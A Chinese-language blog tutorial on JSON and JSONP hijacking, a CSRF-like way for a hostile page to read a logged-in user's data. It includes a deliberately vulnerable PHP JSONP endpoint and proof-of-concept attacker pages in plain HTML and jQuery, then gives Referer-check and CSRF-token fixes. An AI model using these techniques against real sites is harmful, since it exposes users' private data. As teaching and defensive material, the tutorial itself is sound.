json劫持
json劫持攻擊又為”JSON Hijacking”,攻擊過程有點類似于csrf,只不過csrf只管發送http請求,但是json-hijack的目的是獲取敏感數據。
一些web應用會把一些敏感數據以json的形式返回到前端,如果僅僅通過cookie來判斷請求是否合法,那么就可以利用類似csrf的手段,向目標服務器發送請求,以獲得敏感數據。
比如下面的鏈接在已登錄的情況下會返回json格式的用戶信息:
http://www.test.com/userinfo
攻擊者可以在自己的虛假頁面中,加入如下標簽:
<script src="http://www.test.com/userinfo"></script>
如果當前瀏覽器已經登錄了www.test.com,并且cookie未過期,然后訪問了攻擊者的虛假頁面,那么該頁面就可以拿到json形式的用戶敏感信息,因為script標簽會自動解析json數據,生成對應的js對象。然后再通過
Object.prototype.__defineSetter__
這個函數來觸發自己的惡意代碼。
但是這個函數在當前的新版本chrome和firefox中都已經失效了。
jsonp劫持
jsonp是一個非官方的協議,利用script元素的開放策略,網頁可以得到從其他來源動態產生的json數據,因此可以用來實現跨域。(關于JSONP可以參考我的博文:http://www.49028c.com/article/31167.htm)
web程序如果通過這種方式跨域之后,攻擊者完全可以在自己的虛假頁面中發起惡意的jsonp請求,這就引來了安全問題。比如:
<script>function useUserInfo(v){ alert(v.username);}</script><script src="http://www.test.com/userinfo?callback=useUserInfo"></script>
如果服務器端的userinfo接口支持jsonp,那就會使虛假頁面成功執行useUserInfo函數,從而導致安全問題。
解決方法
其實json劫持和jsonp劫持屬于CSRF( Cross-site request forgery 跨站請求偽造)的攻擊范疇,所以解決的方法和解決csrf的方法一樣。
1、驗證 HTTP Referer 頭信息;
2、在請求中添加 csrfToken 并在后端進行驗證;
關于CSRF攻擊可以參考我的博文:http://www.49028c.com/article/157550.htm
PS:JSONP劫持漏洞實例
getUser.php
<?phpheader('Content-type: application/json');$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//獲取回調函數名//json數據//$json_data = '["id","user"]';$json_data='({"id":"1","name":"Aaron"})';echo $jsoncallback . "(" . $json_data . ")";//輸出jsonp格式的數據?>
Payload利用:
客戶端實現 callbackFunction 函數
<!DOCTYPE html><html><head><meta charset="utf-8"><title>JSONP劫持測試</title></head><body><script type="text/javascript">function callbackFunction(result) { alert(result.name); }</script><script type="text/javascript" src="http://127.0.0.1/test/getUser.php?jsoncallback=callbackFunction"></script></body></html>
jQuery 使用 JSONP
<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>JSONP劫持測試</title> <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script> </head><body><div id="divCustomers"></div><script type="text/javascript"> $.getJSON("http://127.0.0.1/test/getUser.php?jsoncallback=?", function(getUsers){ alert(getUsers.name); });</script></body></html>
以上就是本文的全部內容,希望對大家的學習有所幫助,也希望大家多多支持武林網。權聲明:本文為博主原創文章,轉載請附上博文鏈接!
新聞熱點
疑難解答